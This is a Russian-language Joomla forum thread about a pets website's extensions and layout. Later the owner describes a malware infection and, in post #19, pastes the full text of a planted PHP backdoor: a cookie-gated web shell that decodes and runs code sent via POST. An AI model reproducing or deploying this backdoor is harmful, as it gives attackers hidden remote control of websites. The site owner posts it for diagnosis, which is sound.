Joomla 4. Компонент K2 и форк K2ForJ4 (18 янв 2024)

Если вас, как и меня, достало выслушивать (вычитывать) бесконечные обещания разработчика K2 опубликовать версию компонента K2 под Joomla 4 (без чего невозможно реализовать апгрейд from Joomla 3 to Joomla 4) - воспользуйтесь форком K2ForJ4. Который в данный момент установлен и без каких-либо проблем работает на этом веб-сайте.

Сайт про животных

Больше
12 года 5 мес. назад - 12 года 5 мес. назад #11 от Marysia
Marysia ответил в теме Re: Сайт про животных
Arhitektorius а что за модуль используется для Объявлений (под форумом) классный! как это у вас столько влезло на сайт. А у меня развернуться негде(((
Последнее редактирование: 12 года 5 мес. назад пользователем Marysia.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Dev banner 1
Больше
12 года 5 мес. назад #12 от Arhitektorius
Arhitektorius ответил в теме Re: Сайт про животных
Marusia, это обыкновенный компонент AdsManager и стандартный модуль вывода последних объявлений к нему.
Из всех протестированных компонентов объявлений, этот по моему мнению самый удобный.

Моё хобби стало моей проффесией ;)
Спасибо сказали: Marysia

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
12 года 5 мес. назад - 12 года 5 мес. назад #13 от Marysia
Marysia ответил в теме Re: Сайт про животных
мне до этого далеко .... У меня какач то дурацкая доска объявлений над форумом (( ее и не видно Надо ..надо что-то менять .. Вообще замечаю что собственный дизайн начинает приедаться и хочется смены имиджа))

А объявления вы вывешиваете или посетители?
Последнее редактирование: 12 года 5 мес. назад пользователем Marysia.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
12 года 5 мес. назад - 12 года 5 мес. назад #14 от Aleksej
Aleksej ответил в теме Re: Сайт про животных

Arhitektorius пишет: никого же не раздражает поиск в яндексе или гугле. (хотя может я сравниваю несравнимое)

Ну, в некотором смысле - да... форма поиска, предлагаемая Яндексом или Google для размещения на сайтах - совершенно иная, нежели поиск собственно в Яндекс или Google. Никогда и нигде не видел столь длинного поиска на сайтах; впрочем, если так задумано...

результаты поиска выглядят более пристойно

Единственное, что могу здесь сказать - форма поиска и результаты поиска это ведь совершенно не одно и то же; Яндекс предлагает, в частности, вывести результаты своего поиска на любую страницу в iframe, хоть на всю ширину.
Последнее редактирование: 12 года 5 мес. назад пользователем Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
12 года 5 мес. назад #15 от Arhitektorius
Arhitektorius ответил в теме Re: Сайт про животных
Вообще "должны" вывешивать посетители (зарегистрированные пользователи), но пока аудитория сайта не очень большая - приходится самим что-либо постить...
А насчет "мне до этого далеко" это вы зря... Попробуйте, там все просто! (Это ничуть ни сложнее, чем поставить PhocaGalery) Например, заведите себе тестовый поддомен, поставьте на него с нуля Джумлу и экспериментируйте с шаблонами, модулями, компонентами и т.п. Вот увидите, через месяц будете над нынешними своими мыслями смеяться! )))
А насчет того, что Вам развернуться негде... (не помню, может уже говорил)
1 Вот, например у вас есть менюка "Разделы сайта" почему бы ее не поместить под шапкой горизонтально?
2 "О клубе" и "Поддерживаем" перенести вниз
3 "Читайте" перенести в левую колонку
Вот - появится одна свободная колонка!!!

Моё хобби стало моей проффесией ;)
Спасибо сказали: Marysia

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
10 года 9 мес. назад - 10 года 9 мес. назад #16 от Aleksej
Aleksej ответил в теме Re: Сайт про животных
Arhitektorius, что-то мне совсем не удается зайти к тебе на petscafe.ru ... случилось что-нибудь? Или просто kunena апгрейдишь? ;)
Последнее редактирование: 10 года 9 мес. назад пользователем Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
10 года 9 мес. назад - 10 года 9 мес. назад #17 от Arhitektorius
Arhitektorius ответил в теме Re: Сайт про животных
Мдааа! Что-то случилось...
Недавно попадал в бан яндекса и гугла - обнаруживалась зараза. Причем, ровным счетом целый год я с сайтом ничего не делал! Те не ставил никаких расширений. У меня в айфрейме грузился вредоносный код с какого-то хоста. Найти не успел - зараза сама собой пропала. Т.е. как пропала, видимо или с того хоста убрали код который подгружался, или данный скрипт ну ооочень хорошо прячется от поисковиков.
Ну в общем как-то так. Теперь вот то что там есть... Сегодня поразбираюсь.. Спасибо за то, что сказал (почему-то яндексметрика мне ничего не сообщила) Кстати на все мои сайты в последние полгода настолько усилились атаки, что я даже сам офигеваю! Кто иньекцию пытается впулить, кто еще чего! Что с миром твориться! На днях на хостера нападали... Может взаимосвязано :blink:

PS Другие мои сайты ща недоступны - на днях буду поднимать свой сервак и переносить их туда.

Моё хобби стало моей проффесией ;)
Последнее редактирование: 10 года 9 мес. назад пользователем Arhitektorius.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
10 года 9 мес. назад #18 от Aleksej
Aleksej ответил в теме Re: Сайт про животных

Arhitektorius пишет: ...обнаруживалась зараза. Причем, ровным счетом целый год я с сайтом ничего не делал! Те не ставил никаких расширений.

...Кстати на все мои сайты в последние полгода настолько усилились атаки, что я даже сам офигеваю! Кто иньекцию пытается впулить, кто еще чего!



Мне известен совершенно аналогичный случай - человек точно так же "целый год с сайтом ничего не делал", в том числе и обновлений не накатывал... И в результате сайт оказался заражен и выпал из индекса Яндекса. Может, в этом дело?

А в чем выражаются "усиление атак? По каким признакам ты определяешь, что имело место именно попытка злонамеренного вмешательства в работу сайта?

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
10 года 9 мес. назад #19 от Arhitektorius
Arhitektorius ответил в теме Re: Сайт про животных
System - Marco's SQL Injection постоянно верещит!

На данный момент времени нету, но обнаружил файлик странного содержания
Кажись это содержание не очень хорошее :S
И дата создания его свежая - прошлонедельная...
Адрес 0:/public_html/plugins/system/xajax_0.2.5/a0daf02a12.php

Полный текст файла:
Code:
<?php if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){ if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){ echo '<textarea id=areatext>'; eval($msg); echo '</textarea>bg'; exit; }} ?>

Кроме того, админка мне рисует это

Error: the xajax Javascript file could not be included. Perhaps the URL is incorrect?
URL: petscafe.ru/plugins/system/xajax_0.2.5/xajax_js/xajax.js


Файл по указанному пути лежит

Уже даже и не припомню че это за плагин xajax_0.2.5 и нафига он стоит у меня...
Позже буду разбираться...

Моё хобби стало моей проффесией ;)

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
10 года 9 мес. назад #20 от Aleksej
Aleksej ответил в теме Re: Сайт про животных
Действительно, странный файл...

php-xajax (0.2.5-4)

A library to develop Ajax applications.
Xajax is an open source PHP class library that allows you to easily create powerful, web-based, Ajax applications using HTML, CSS, JavaScript, and PHP. Applications developed with xajax can asynchronously call server-side PHP functions and update content without reloading the page.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Работает на Kunena форум